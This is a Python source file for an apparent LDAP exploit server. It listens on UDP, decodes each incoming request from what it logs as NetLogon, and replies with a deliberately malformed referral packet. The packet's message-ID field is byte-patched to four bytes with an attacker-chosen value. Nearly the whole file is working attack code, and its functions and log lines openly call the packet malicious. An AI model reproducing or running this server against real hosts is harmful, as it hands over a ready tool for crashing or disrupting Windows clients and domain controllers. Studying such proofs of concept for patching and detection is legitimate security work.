import asyncio
from logger import logger
from ldaptor.protocols import pureldap
from ldaptor.protocols import pureber

# LDAP result code used for referral responses.
REFERRAL_RESULT_CODE = 10


class LDAPSearchResultDoneRefferal(pureldap.LDAPSearchResultDone):
    """SearchResultDone whose wire encoding also carries the referral URLs."""

    def toWire(self):
        """Encode this result as a BER sequence tagged with ``self.tag``.

        The sequence always holds the result code, matched DN and error
        message. The referral URLs are appended (as a sequence tagged 0xA3)
        only when the result code is 10 and ``self.referral`` is non-empty.
        Server SASL credentials are appended whenever they are set.
        """
        fields = [
            pureber.BEREnumerated(self.resultCode),
            pureber.BEROctetString(self.matchedDN),
            pureber.BEROctetString(self.errorMessage),
        ]

        # 10 is the LDAP referral result code.
        if self.resultCode == 10 and self.referral:
            referral_urls = [pureber.BEROctetString(url) for url in self.referral]
            # 0xA3: context-specific tag for the referral element.
            fields.append(pureber.BERSequence(referral_urls, tag=0xA3))

        if self.serverSaslCreds:
            fields.append(
                pureldap.LDAPBindResponse_serverSaslCreds(self.serverSaslCreds)
            )

        return pureber.BERSequence(fields, tag=self.tag).toWire()


def get_malicious_ldap_packet(message_id: int, lm_referral: int = 2) -> bytes:
    """Build a referral response whose message ID field is widened to 4 bytes.

    A SearchResultDone with result code 10 and the single referral URL
    ``ldap://referral.com`` is wrapped in an LDAPMessage carrying
    ``message_id`` and serialized. The serialized bytes are then patched:

    * the first ``02 01 xx`` (INTEGER, length 1) becomes
      ``02 04 <lm_referral> 00 00 xx``;
    * the byte at offset 1 (the outer length) is increased by 3 to account
      for the three inserted bytes.

    Args:
        message_id: ID placed in the LDAPMessage; normally the ID of the
            request being answered.
        lm_referral: Value written as the first (most significant) byte of
            the widened message ID. Must be non-zero, even and at most 255.

    Returns:
        The patched packet bytes.

    Raises:
        ValueError: If ``lm_referral`` is 0, greater than 255, or odd.
    """
    if lm_referral == 0 or lm_referral > 255:
        raise ValueError("lm_referral must be between 1 and 255")
    if lm_referral & 1:
        raise ValueError("lm_referral must be an even number")

    referral_done = LDAPSearchResultDoneRefferal(
        resultCode=REFERRAL_RESULT_CODE,
        referral=['ldap://referral.com'],
    )
    wire = pureldap.LDAPMessage(value=referral_done, id=message_id).toWire()

    # Locate the length byte of the first one-byte INTEGER.
    # NOTE(review): presumably this is always the message ID, which requires
    # the ID to be encoded in a single byte - confirm against callers.
    length_pos = wire.index(b"\x02\x01") + 1
    value_pos = length_pos + 1
    original_id_byte = wire[value_pos].to_bytes(1, 'big')

    widened = b"".join((
        wire[:length_pos],               # everything up to the INTEGER tag
        b"\x04",                         # new length of the message ID
        lm_referral.to_bytes(1, 'big'),  # encoded lm_referral
        b"\x00\x00",                     # padding
        original_id_byte,                # original message ID byte
        wire[value_pos + 1:],            # remainder of the packet
    ))

    # Three bytes were inserted, so bump the outer length byte accordingly.
    outer_length = (widened[1] + 3).to_bytes(1, 'big')
    return widened[:1] + outer_length + widened[2:]


class LdapServerProtocol(asyncio.DatagramProtocol):
    """Datagram protocol that answers each LDAP request with a referral packet."""

    def __init__(self):
        super().__init__()
        message_context = pureldap.LDAPBERDecoderContext_LDAPMessage(
            fallback=pureldap.LDAPBERDecoderContext(
                fallback=pureber.BERDecoderContext()
            ),
            inherit=pureldap.LDAPBERDecoderContext(
                fallback=pureber.BERDecoderContext()
            ),
        )
        # Decoder context used to parse incoming datagrams as LDAP messages.
        self.berdecoder = pureldap.LDAPBERDecoderContext_TopLevel(
            inherit=message_context
        )
        # Assigned in connection_made().
        self.transport = None

    def connection_made(self, transport: asyncio.DatagramTransport) -> None:
        """Remember the transport so replies can be sent later."""
        self.transport = transport
        logger.info("NetLogon connected")

    def datagram_received(self, data: bytes, addr) -> None:
        """Decode the request and reply to ``addr`` with the crafted packet."""
        # Only the message ID of the decoded request is used.
        request, _consumed = pureber.berDecodeObject(self.berdecoder, data)
        logger.info(f"Received LDAP request from NetLogon {addr}")

        # Build the response packet that mirrors the request's message ID.
        reply = get_malicious_ldap_packet(request.id)
        logger.info(f"Sending malicious LDAP response packet to {addr}: {reply}")

        # Send it back to the client.
        self.transport.sendto(reply, addr)

    # NOTE(review): asyncio's DatagramProtocol documents error_received() but
    # not connection_refused() - confirm whether anything ever calls this.
    def connection_refused(self, exc) -> None:
        """Log a refused connection."""
        logger.error(f"Connection refused: {exc}")

    def error_received(self, exc) -> None:
        """Log an error reported for a send or receive operation."""
        logger.error(f"Error received: {exc}")


async def run_exploit_server(listen_port: int):
    """Serve LdapServerProtocol over UDP on 0.0.0.0:``listen_port``.

    Blocks on a future that is never resolved, so the coroutine only ends
    when it is interrupted or cancelled; the transport is always closed on
    the way out.
    """
    loop = asyncio.get_running_loop()
    transport, _protocol = await loop.create_datagram_endpoint(
        LdapServerProtocol,
        local_addr=('0.0.0.0', listen_port),
    )

    try:
        # Keep the server running forever (until Ctrl-C or the loop is closed).
        await asyncio.Future()
    except KeyboardInterrupt:
        # NOTE(review): under asyncio.run() Ctrl-C may surface here as task
        # cancellation instead; cleanup still happens through `finally`.
        pass
    finally:
        transport.close()
        logger.info("Server has been shut down.")